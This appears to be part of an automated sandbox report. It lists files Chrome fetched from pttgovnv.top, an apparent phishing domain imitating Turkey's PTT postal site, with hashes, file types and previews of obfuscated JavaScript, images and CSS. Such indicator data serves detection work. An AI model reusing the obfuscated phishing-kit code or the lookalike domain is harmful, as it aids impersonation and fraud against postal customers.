          MD5:2CC5743A1A8F6BC6384F081849BAC3FD
          SHA1:70E5ED0109BCA40261543210C5A178C7FFC29633
          SHA-256:7AC38EAC2CC2002FEBE7613E3DF10786A9BB95AB401C4D8EAE3D0319551AF8A2
          SHA-512:8FA2808DEAD785B6B387151F1BE53A70E3AA8F53BAEA3B3E24D2791D2EBF10478E0441B2190BD49907113B26632CAD854EED28118CB368087980A264AD2613E3
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffooter-logo.568f7be2.png&w=1080&q=75
          Preview:RIFF.,..WEBPVP8X...........5..ALPH.%....C @...?........j.M;.Cf. Q"...9.J.&.g.....8..W<........}.D...._....?5...hk..w.....l..p..U..P....z_>k.S.[U-......m..Zuk..`n.z.V&.j......}=.b........x..".%..:P}F*Jr.E..I...u.PqK.m.....t........ .=/&..V%.....*.y<?X.....<n..39..I..t.6......w^,t..l.r..A.N......$...tu.......@MQ.s* ....KX.jWIf?....S......A.m.....6.....l.c.)..H.>.M.\....=...UoYI2.1.Z..=g>!.d.,(kr.-.&..3aa.np......4lWy'.U.....>...X....rp...DwCI.U..C..P... ,...I.+...v.>t7V.T..O.V..s/.CPD/..W.V$W..|.xv7u..S$...1....<..........l......y.t1._.......jO\h5G.6..2..N.t7....}...s..<y...o.]m.:..T..*..Z._....'.......f....J..<G:{..'....d1...q.m..6.1/..q._.....'+..K>]6[........V.gW...yZ^H.8Z.B.Z.......8_.B.Z ...|.S......P...+.f......G.,.....|yUS.._..P....5.^^....X(]..e[.{ZT.....P....^L.X....G...s..%.Y.....y. H2..-...X(Y.f.1.n.[. \..g...{....v...*...S;..If......D.....d..].. \.........Q.N......;..I.3...."..d.]'{u........6.w.p"....x.:.......[.$..pm.D..B.n
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (4086)
          Category:downloaded
          Size (bytes):4139
          Entropy (8bit):5.393553910974737
          Encrypted:false
          SSDEEP:96:MxxRw7sQE5qZ1WjOaIa2/m6AVt1VPS36HubUzo9u:6xr5UeEFAB+TUzuu
          MD5:DFEE98010DCF2B223E0680CAD37056CC
          SHA1:A63C810D8E0A3D9D200D2DFADC1FED0A63691B20
          SHA-256:702355D4CC2083DAADFED72A685F55402783DB80AAA2971C41258A550551E989
          SHA-512:C697CAE9D33FD36D901731FED8204656895FFAC8D3F77B02003F585913053121CA5DD28F0223D99DD6465BF9AE80B3F82F2C43F0FEA08E286A0F3326C72D1E14
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/chunks/webpack-9869d3074c720ef6.js
          Preview:!function(){"use strict";var e={},t={};function n(r){var o=t[r];if(void 0!==o)return o.exports;var u=t[r]={exports:{}},i=!0;try{e[r].call(u.exports,u,u.exports,n),i=!1}finally{i&&delete t[r]}return u.exports}n.m=e,function(){var e=[];n.O=function(t,r,o,u){if(!r){var i=1/0;for(d=0;d<e.length;d++){r=e[d][0],o=e[d][1],u=e[d][2];for(var f=!0,c=0;c<r.length;c++)(!1&u||i>=u)&&Object.keys(n.O).every((function(e){return n.O[e](r[c])}))?r.splice(c--,1):(f=!1,u<i&&(i=u));if(f){e.splice(d--,1);var a=o();void 0!==a&&(t=a)}}return t}u=u||0;for(var d=e.length;d>0&&e[d-1][2]>u;d--)e[d]=e[d-1];e[d]=[r,o,u]}}(),n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,{a:t}),t},function(){var e,t=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__};n.t=function(r,o){if(1&o&&(r=this(r)),8&o)return r;if("object"===typeof r&&r){if(4&o&&r.__esModule)return r;if(16&o&&"function"===typeof r.then)return r}var u=Object.cre
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows icon resource - 1 icon, 32x19, 32 bits/pixel
          Category:dropped
          Size (bytes):2570
          Entropy (8bit):3.527155255496045
          Encrypted:false
          SSDEEP:24:06baFI5vY0u68gsGOLynrZFTWxBtwJGwPBheAuaAxI4l60O+9DL:0h8vo6jZOsrZFyEJGwPBh7uve4llOwP
          MD5:14EE76D740C6D351E447C37B1A9DDB37
          SHA1:CDD7D04160D5624C219CCB8FD2D4F557D77DB99B
          SHA-256:32EF97D69F5188DF3EB8BCA51E02A151FFB615E21FA0E4EABFA884CDD4DB0485
          SHA-512:66945FA193F2E3B94A35FC4C5AA6F19321B3F832BB0491B70A1787C12CB6B5A25E7D591D9FE33827883934A3DB3808BDDC64898B16ED824244AA15EE86351817
          Malicious:false
          Reputation:low
          Preview:...... ..... .........(... ...&..... .........#...#.................................................$..V..r..`..5..............?..Z..d..Z..=..........................................................T........p..,........ ..f.............................1.......................................r........w..........."..............E.................A........|............................f...........(...........\........s................................W......................../...........].......................5......................................e...A...Y.................Q...........7.......................&..............................................&..............t.....q...........0..............y........:.................................................!...O......8........,.................:........A....
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (17840), with no line terminators
          Category:dropped
          Size (bytes):17840
          Entropy (8bit):5.05052143987542
          Encrypted:false
          SSDEEP:192:w58y3F4D2arxp2CygGCL1dylCL1J1i5iONdb9dJNdsoyVjU3kagh+hsr/2g1w:wV3F4K2xwbzWVjYXgchsDE
          MD5:D0005C8D31546500BA92FED4EBA66850
          SHA1:51290A4147664F5968BC24476181E92C27DABF70
          SHA-256:925325FAAC0525494FFAA66AC114EDE355FDF6C2715B9C71D0176EA861A98294
          SHA-512:8E7F6734C2ABC891FDA41FD3A6B6C1DFADCC932F93853C19860FC4C4B32BB546EA1319E175907D15DF65305FCD0A9B3A702B408CC99BBCF56149B23F841FB4B9
          Malicious:false
          Reputation:low
          Preview:if(!window.ACJS){window.ACJS={};}window.ACJS.linkifyHtml=function(t){"use strict";var e={amp:"&",gt:">",lt:"<",nbsp:" ",quot:'"'},i=/^#[xX]([A-Fa-f0-9]+)$/,n=/^#([0-9]+)$/,s=/^([A-Za-z0-9]+)$/,o=function(){function t(t){this.named=t}return t.prototype.parse=function(t){if(t){var e=t.match(i);return e?String.fromCharCode(parseInt(e[1],16)):(e=t.match(n))?String.fromCharCode(parseInt(e[1],10)):(e=t.match(s))?this.named[e[1]]||"&"+e[1]+";":void 0}},t}(),a=/[\t\n\f ]/,r=/[A-Za-z]/,h=/\r\n?/g;function u(t){return a.test(t)}function p(t){return r.test(t)}var c=function(){function t(t,e,i){void 0===i&&(i="precompile"),this.delegate=t,this.entityParser=e,this.mode=i,this.state="beforeData",this.line=-1,this.column=-1,this.input="",this.index=-1,this.tagNameBuffer="",this.states={beforeData:function(){var t=this.peek();if("<"!==t||this.isIgnoredEndTag()){if("precompile"===this.mode&&"\n"===t){var e=this.tagNameBuffer.toLowerCase();"pre"!==e&&"textarea"!==e||this.consume()}this.transitionTo("dat
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):68155
          Entropy (8bit):7.976328915331773
          Encrypted:false
          SSDEEP:1536:Psws3e4vQs5asznNtA2jZXiM1zGLvwTFXa6Ad1HgK6d3bzAGCNGVJVJVGj:EAYTBT1iLYTFXa1dtp6dr6
          MD5:3AF1FB65D2985042EC15BAF2A68EDEFD
          SHA1:DCFF4DCD6389FAB17DAEA641FA37F06CE1646FE9
          SHA-256:C80A4608064847A85102440DBBFF50BB92EE57055DCEA38B23B8FDC33AFA6830
          SHA-512:98E8CA2E55BC1D057F81E200E710A6BF36D20509612CD310E79A206F7A72F483C7FC07FF9C74D06DC9BD5E0BD92BA8039080E998D452F6D791CB120F908FBF75
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<....IDATx........wf...88@......c..{.l..Q..MbL4.h,1**.(....+*...H...p....y..3...*$...K.m.....7..O#.1@..A..A._8....A..AP.!.. .. (...A..A..q.. .. (...A..A..q.. .. ..8.A..A..q.. .. ..8.A..A..E.. .. ..8.A..A..E.. .. ..".A..A..A.. .. ..".A..A..A.. .. ....C..A..A.. .. ....C..A..AP.!.. ....C..A..AP.!.. .. (...A..AP.!.. .. (...A..A..q.. .. ..8.A..A..q.. .. ..8.A..A..E.. .. ..8.A..A..E.. .. ..".A..A..E.. .. ..".A..A..A.. .. ..".A..A..A.. .. ....C..A..AP.!.. ....C..A..AP.!.. .. (...A..AP.!.. .. (...A..A..q.. .. (...A..A..q.. .. ..8.A..A..q.. .. ..8.A..A..E.. .. ..".A..A..E.. .. ..".A..A..A.. .. ..".A..A..A.. .. ....C..A..A.. .. ....C..A..AP.!.. .. (...A..AP.!.. .. (...A..A..q.. .. (...A..A..q.. .. ..8.A..A..q.. .. ..8.A..A..E.. .. ..8.A..A..E.. .. ..".A..A..A.. .. ..".A..A..A.. .. ....C..A..A.. .. ....C..A..AP.!.. ....C..A..AP.!.. .. (...A..AP.!.. .. (...A..A..q.. .. ..8.A..A..q.. .. ..8.A..A..E.. ..
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (52146)
          Category:downloaded
          Size (bytes):53104
          Entropy (8bit):5.227530657260376
          Encrypted:false
          SSDEEP:1536:TMmDcX+V9NQhASRs39o2sBabuVV0cI7fxDRUZq:TRAX+7/RsBKuj0cI7VRUZq
          MD5:A776E06B72C85E797B740BD2D8B72177
          SHA1:178F266CB57B535F9026210BD0A81E2D4F661F54
          SHA-256:59E40E563B52ED0F9F6F98F299618ECCC9A75F47CFEE7B4125BBE5D548AD3C31
          SHA-512:80026AF0668053BF6BA7EC6BD5261F885CDDB06191E9EE2D60E8B05413FE579E44D9E6D24B682246209D3E08AA835917AF4B9BC50A2A4D265FC5F7DA6B16EE69
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/assets/37d8eb31JxKnW.js
          Preview:const a9_0x13d023=a9_0x3647;(function(_0x1c0f4c,_0x5b4f7e){const _0x18c0e3=a9_0x3647,_0x35d09c=_0x1c0f4c();while(!![]){try{const _0xa80895=-parseInt(_0x18c0e3(0xfb))/0x1*(parseInt(_0x18c0e3(0x12e))/0x2)+parseInt(_0x18c0e3(0x19c))/0x3+-parseInt(_0x18c0e3(0x108))/0x4*(parseInt(_0x18c0e3(0x1aa))/0x5)+parseInt(_0x18c0e3(0x1a2))/0x6*(-parseInt(_0x18c0e3(0x1c8))/0x7)+-parseInt(_0x18c0e3(0x16a))/0x8+parseInt(_0x18c0e3(0x1be))/0x9+-parseInt(_0x18c0e3(0x14a))/0xa*(-parseInt(_0x18c0e3(0x106))/0xb);if(_0xa80895===_0x5b4f7e)break;else _0x35d09c['push'](_0x35d09c['shift']());}catch(_0x5b3a28){_0x35d09c['push'](_0x35d09c['shift']());}}}(a9_0x5403,0x5a626));import{s as a9_0x30f9d7,u as a9_0x1f3b06,x as a9_0x2ee3d1,r as a9_0x4c70bc,n as a9_0x803a5b,y as a9_0x3e60a4,d as a9_0x255cc3,z as a9_0x46165c,A as a9_0x2b3cd7,a as a9_0x5a4862,w as a9_0x273496}from'./index-f5457718.js';/*!. * vue-router v4.1.6. * (c) 2022 Eduardo San Martin Morote. * @license MIT. */.const G=typeof window<'u';function nt(_0xe
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (52146)
          Category:dropped
          Size (bytes):53104
          Entropy (8bit):5.227530657260376
          Encrypted:false
          SSDEEP:1536:TMmDcX+V9NQhASRs39o2sBabuVV0cI7fxDRUZq:TRAX+7/RsBKuj0cI7VRUZq
          MD5:A776E06B72C85E797B740BD2D8B72177
          SHA1:178F266CB57B535F9026210BD0A81E2D4F661F54
          SHA-256:59E40E563B52ED0F9F6F98F299618ECCC9A75F47CFEE7B4125BBE5D548AD3C31
          SHA-512:80026AF0668053BF6BA7EC6BD5261F885CDDB06191E9EE2D60E8B05413FE579E44D9E6D24B682246209D3E08AA835917AF4B9BC50A2A4D265FC5F7DA6B16EE69
          Malicious:false
          Reputation:low
          Preview:const a9_0x13d023=a9_0x3647;(function(_0x1c0f4c,_0x5b4f7e){const _0x18c0e3=a9_0x3647,_0x35d09c=_0x1c0f4c();while(!![]){try{const _0xa80895=-parseInt(_0x18c0e3(0xfb))/0x1*(parseInt(_0x18c0e3(0x12e))/0x2)+parseInt(_0x18c0e3(0x19c))/0x3+-parseInt(_0x18c0e3(0x108))/0x4*(parseInt(_0x18c0e3(0x1aa))/0x5)+parseInt(_0x18c0e3(0x1a2))/0x6*(-parseInt(_0x18c0e3(0x1c8))/0x7)+-parseInt(_0x18c0e3(0x16a))/0x8+parseInt(_0x18c0e3(0x1be))/0x9+-parseInt(_0x18c0e3(0x14a))/0xa*(-parseInt(_0x18c0e3(0x106))/0xb);if(_0xa80895===_0x5b4f7e)break;else _0x35d09c['push'](_0x35d09c['shift']());}catch(_0x5b3a28){_0x35d09c['push'](_0x35d09c['shift']());}}}(a9_0x5403,0x5a626));import{s as a9_0x30f9d7,u as a9_0x1f3b06,x as a9_0x2ee3d1,r as a9_0x4c70bc,n as a9_0x803a5b,y as a9_0x3e60a4,d as a9_0x255cc3,z as a9_0x46165c,A as a9_0x2b3cd7,a as a9_0x5a4862,w as a9_0x273496}from'./index-f5457718.js';/*!. * vue-router v4.1.6. * (c) 2022 Eduardo San Martin Morote. * @license MIT. */.const G=typeof window<'u';function nt(_0xe
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):16498
          Entropy (8bit):7.8582701910541655
          Encrypted:false
          SSDEEP:384:9ogvnYzo4hpswgtGt8n9o4KsbPHRT8DGCkj21VEwU:DnSxrsLtGt54trHx8D3U
          MD5:9A038EA93F4919E25D2064BA48874586
          SHA1:4996E14DCB1BA05CD29D19C45DFAABA45AA3BCC2
          SHA-256:49FE57608D794F7B7F923847B653CCEC67C5C2083906CB5780ECD7B8F22BFD16
          SHA-512:6A9918EA7AE0DEDBAA1E9D0FC7D41274FEE90C9D29A5254D4F33C4BF87827425CA0B4CDAB76C62AE79A9AB4CB28AA9857E4F4A72CD5612DA45565630CA3AE5E1
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..?.IDATx.......]..G..e#{W...N.vDR!..]a...cG!.]*G4.|..;"..~\..@...4.;..:N."......A.;'...#..r.G..4..1.8...'..v.%...{...........g...:.....~>.....c...P,7q.....q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q....8........@.....!.........B.....q....8........@.... ..........B....!.....8........@.... ..........B....!.....8.........q... .........@.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q... .........@.....!.........B.....q....8........@.... ..........B.....q....8........@.... ....<2_.^......q(.=.lt./u/.U8....X....p.`.......k.{-k..4.P>.Q.r...C..G.My.u..|.3..!.........u...^M/.mqt&2.I..|....jK..^...^Hj.p\.......+....6..5.6g;@..t.9..........P7...lz5.....y..".x.%. ..qo..).lw)f0.Pc...0.!.dz.!3c.......w..q...l.....l..C.....n%.&$.......q
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):44008
          Entropy (8bit):7.959695770661982
          Encrypted:false
          SSDEEP:768:jich1+kvACQ6+XRoonVs3sruEET2QAqHDBucmp7aaDkkNRWGKPRkU+:FE6+B9OsrlEonfaaDDRWGKPRkU+
          MD5:F29E09E7EB1220F3B89EB5F7C6E70C0F
          SHA1:EFE3BD42DD2920662239EE8A7915B1AB4A030A1C
          SHA-256:72F4F765EE364C8CABDDC25B48E28DB60BF229B3807EF78BEE1127F9AD157AD7
          SHA-512:B4E600B9BA6918BF68524BF3CFE9103B931C1EAAE92F94A3B57E3CF57DDD692831BAACE501A96B971948A12162E1A6BF26460E40B2661E5B1D4F602BAE4BC158
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/46.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<...uIDATx....de.....s........A`...J....pUt..kB.........l..I..HN.0..0......U]9.......{zf:Tw.g>5.....:.=.Ur....a..a......0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0...1..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0....0..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0....1..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0....0.S)<U.Z#..T..s%..V...v..S..1.......!q.P.......!qJ...5....0,q..0*O....j....y..l..$gz1S.I)+lE.....w{...N.4~.A....n.Qq.aq......$.0,q..,va#A.b..V,k..)%b......e..
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):22730
          Entropy (8bit):7.866153192085963
          Encrypted:false
          SSDEEP:384:pP5QuY5tMApoeSaPA53115KmABEC40OQ38GnamIGZJQYJZgSM4vL6PpnE6BWOyUV:pRA5xpoeSaEuF40sGnPdQOZyoApnE6jV
          MD5:F4F38EA525A386F824CB5FAD76DD9896
          SHA1:167F97D1219368BE2EDBAFA720A2AC5A657ACAFD
          SHA-256:0DD037A0E7DD6E450A2DC80537185315EA5DDE1050A0328DDCA3D4F232BAD669
          SHA-512:30EE24C56483CCDA07E6B774E7A27A30CAD3440E154C255979A82F90C5B0CA49703B817D7E7879AD0DEFC68411BB9267A6E03AE5A868A7EB6A4FAF4855947E5F
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/47.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..XWIDATx...x..y......@.$.....$r....qb.b.&..I.4Ic.b.8i.6...I...9........s.V.....I..M.4]S..Z...U.%..u...B........H..I..q!..G.......`.7..].J).........]..............8....................H.............@.......$......@...... q............. q.....................8....................H.............@.......$......@...... q............. q.....................8....................H.............@.......$......@...... q............. q.....................8....................H.............@.......$......@...... q............. q.....................8....................H.............@.......$......@.......$............. q.....................8....................H.............@.......$......@.......$............. q.....................8....................H.............@.......$......@.......$............. q.....................8....................H.............@.......$......@.......$.............
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (65536), with no line terminators
          Category:dropped
          Size (bytes):66490
          Entropy (8bit):5.199364533779825
          Encrypted:false
          SSDEEP:384:NJMB6MVRvBaKyRABaKyRFF5JDWOenySFpntgE:6VRQR5RFNydPFpntgE
          MD5:64D9C4EFF2ED1E10244C4A2F3B06C337
          SHA1:466775C58D88FE86056730E9830B72908E7DCCBE
          SHA-256:F296A66E264FAA02B6A8CB293D0E52476A9A97B9A625FBDBF3976157A0CBABD1
          SHA-512:6D8B14899B02B0E2AB25486C777DEB6E0628FF6018CBBBF1FD7AB9104F76F9A7B3A256B3986404330ACB532F2C48FF5226B6184B96478AF98908E9F698FCC606
          Malicious:false
          Reputation:low
          Preview:.styles_shipmentTrackingPreviewModal__W8Vv6{position:fixed;top:0;right:0;left:0;bottom:0;background-color:rgba(0,0,0,.8);-webkit-backdrop-filter:blur(8px);-moz-backdrop-filter:blur(8px);-o-backdrop-filter:blur(8px);backdrop-filter:blur(8px);z-index:55;overflow-y:auto;transition:visibility .2s,opacity .2s ease-in-out}.styles_shipmentTrackingPreviewModal__W8Vv6>.styles_close__YK3MI{position:fixed;top:2rem;right:3rem;color:#fff;font-size:2rem;font-style:normal;cursor:pointer}.styles_shipmentTrackingPreviewModalOpen__fUMRq{visibility:visible!important;opacity:1!important}.styles_shipmentTracking__TSn_z{position:relative;display:flex;display:-ms-flexbox;flex-direction:row;flex-wrap:wrap;justify-content:space-evenly;align-items:center;width:100%;margin-top:5rem;margin-bottom:5rem;z-index:55}.styles_shipmentTracking__TSn_z>.styles_states__nQ6ze{display:flex;display:-ms-flexbox;flex-direction:column;justify-content:center;position:relative;z-index:5}.styles_shipmentTracking__TSn_z>.styles_stat
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 411 x 254, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):17267
          Entropy (8bit):7.940505571110385
          Encrypted:false
          SSDEEP:384:4K26QEjGZsW/o2WC2UG4KAcgsnfhmPCISSY2/coxq:4KHQNZs0ot9Ms2CISMVq
          MD5:FA3EF547EDCD4B3475DCA6E7F443AD2E
          SHA1:0B2F7E33F94BEA04697CB4E08CDB864833D039F8
          SHA-256:89019CDF74ECD13163AD6E7D0BB69820682D5FA2DC5D5793297FD8C286BF1BF0
          SHA-512:6202874D5180C07B880F893864F1B5AA251197CC8681BFC3255D312A493A11CC678720980A8BDED4AE04C39119EB3D99EEB9F840D981FC362DC243E78AC904A6
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/44.png
          Preview:.PNG........IHDR....................sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^..x]G....,.[.]va...... @..@.....a)..i.e.-...Y....B....w[.d.*.m.H..lK.l....~g.ru5..s..._...{.s..w.7.<..B.!9C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;..B.!.C.!...;sDl.X;>..N.!..#bc......._...P..1v..C.g..)...F.[..E.+.w...}p..1.]!{F.'...N...'....m.....F.O.v...q.+BH<sf..L.Z...~...]....!Ui.s..sS.}.e.......K.Ar...,...?[.j...6....gZ..{.F....iV.....|...........V........N......^.f.uE.}t.=....Dy..Qw$!$.95gcv\a...Y.lkV.bM.{...#..\k..rkG7Z;...Mv....r....KW....k8..I..H.!r.?\.n..W.........t....C.n..vg.q....=&.=..{....BH.s.A@...f.K.Y,...9"<..{..3../=.UgZ.F.h.W...;....~t.\:......TL.2Wa?..v.m.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (1965), with no line terminators
          Category:downloaded
          Size (bytes):1965
          Entropy (8bit):5.287237545046552
          Encrypted:false
          SSDEEP:24:cP2k+LBK+qcy+SDaOrKhbM4O7IlH2VZ5RJR7RRRdilxXmxV4y5T0zxHI2MRRtMav:99Zqh+GOOMlH2Si35A1HpMdtZAlA
          MD5:D66FEBB5B4397732135B71831C138AFD
          SHA1:B2A462BAD03E25C4109424B80B8C3F1CC7055558
          SHA-256:E24C314BD212C166353D089356F9296351B7D31D88E7D386197443A970BA6AB5
          SHA-512:8C933EBA937FD28674F709FE7E2B342877D37F7B1A269EC09023EB98891D6E13402C0F14793DEA90C2CF1B510A6EFFCA317BBAC43EAC30A2336327EFB6D2448F
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/assets/09bf01f8JxKnW.js
          Preview:function a0_0x1726(){const _0x590fb6=['toString','apply','1217280mFYShg','745101HtGRyz','5kGzjZf','(((.+)+)+)','search','2144133WxxWWe','remove','1368812WqIuRv','noopener','click','2226574VjkNhh','449368jzjbqt','4256976MihuCv','append','body','rel','constructo'];a0_0x1726=function(){return _0x590fb6;};return a0_0x1726();}(function(_0x3fc008,_0x3d9ca0){const _0x55189d=a0_0x1055,_0x3a6928=_0x3fc008();while(!![]){try{const _0x29b996=parseInt(_0x55189d(0xcd))/0x1+-parseInt(_0x55189d(0xc4))/0x2+parseInt(_0x55189d(0xd1))/0x3+parseInt(_0x55189d(0xd3))/0x4*(parseInt(_0x55189d(0xce))/0x5)+-parseInt(_0x55189d(0xc5))/0x6+-parseInt(_0x55189d(0xc3))/0x7+-parseInt(_0x55189d(0xcc))/0x8;if(_0x29b996===_0x3d9ca0)break;else _0x3a6928['push'](_0x3a6928['shift']());}catch(_0x571e3b){_0x3a6928['push'](_0x3a6928['shift']());}}}(a0_0x1726,0x61119));function a0_0x1055(_0xf64470,_0x4b0865){const _0x32fcc2=a0_0x1726();return a0_0x1055=function(_0xb13448,_0x57136d){_0xb13448=_0xb13448-0xc2;let _0x172600=_0x32fcc
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:downloaded
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liVkz&sid=M3Npq313xU4h1v3KBQUg
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Web Open Font Format, TrueType, length 333588, version 1.0
          Category:downloaded
          Size (bytes):277726
          Entropy (8bit):6.448501049235182
          Encrypted:false
          SSDEEP:6144:NH8oA4SVVuh1r/OHv6jd6d0KfECwOIZr013qpt3ww+CmQoXXQRmxp+5CQN9SW5x1:WY+nzZCSNuIz4byJ4aC
          MD5:453DA858EA68D549401A2BB066A82B30
          SHA1:A42DA7BCFFE7057CCDC6BC63257BBAF5F577BF44
          SHA-256:2DFA130D930F63AAEE15F038059E10B7EB30016EADB745C40AF7CDFBCE79C5F3
          SHA-512:6E26536AD6828976D99C446DBABF23591972E10B35F13212A4441C57E50CF2D6F94E6452BB5EC31B198C4C572EBBD2AC401F76D4120B341A4D99C4FC1F420E41
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/assets/f18e42bakFGym.woff
          Preview:wOFF........................................OS/2.......`...`....cmap...h...L...L.U..gasp................glyf.......L...L{h.&head.......6...6...hhea...@...$...$...Phmtx...d........+.a.loca...|............maxp....... ... ....name.......<...<....post....... ... ...............................3...................................@.........@...@............... .........................8............. ........... ................................................79..................79..................79............... ./.>.M...#54&#"...#"....;....326=.32654&#)."....3!2654&#.!"....3!2654&#.!"....3!2654&#..............................\...........\...........\.........................................................f...............!".....3.!5265.4&#.#53.7!.!..3..*=......=*f..3......<+....ff....+<..33....g.....H..............0....1..65.4&.!.0....1..65.4&........q. ../.....q...................................................L.}...4&+."...3.3535'..#"&54632..'"......................3267>.7>.7>.54&'
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):11236
          Entropy (8bit):7.782737264318003
          Encrypted:false
          SSDEEP:192:ZK9RLFVUR7LSdHxVoigH9+RwfTKOJsP/E+UpeiT3oCYvwAPYG9V+RMBM8T:WRLPUUjVoigawfWOGxwJ4CYv3PiCGu
          MD5:FF5BD3D7849B187DEC777004626B58FF
          SHA1:4F7FDA5D6D9E8D07E6F8485872FD962007DCF139
          SHA-256:CE97846C74192E04D8DF79782636ADDEC31439985A7278317635E7777F365667
          SHA-512:28555EB25B6F46D8623E1338DAD84E431BA354A1B5A1750E6D3FE86FDDCF78D28C3CDD026BF6F30A8DE4585657453E070F6068A8A6654A0CE5EE34BADF3E12A9
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..+qIDATx...MV........g.&#.to.y.&.4-..d.QF`<...........F...5#....e.HU{..J<.ZZ.9.Q....?}.....`\.8...B...B...B.............. ... ... ....q...q...q...q..B...B...B.............. ... ... ....q...q...q...q..B...B...B.............. ... ... ....q...q...q...q..B...B...B.............. ... ... ....q...q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B...B........7T....Z....../.r.Z9.?gu....?.'..x.......L...<..X.|.m...}.}>.?.k~.,..z..:.8.{}n.._...s......%..i].\..}.i.V..k.Y..].....~>[...._....L........xU...O..|W....p{.!.|@..y.@.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 411 x 254, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):17267
          Entropy (8bit):7.940505571110385
          Encrypted:false
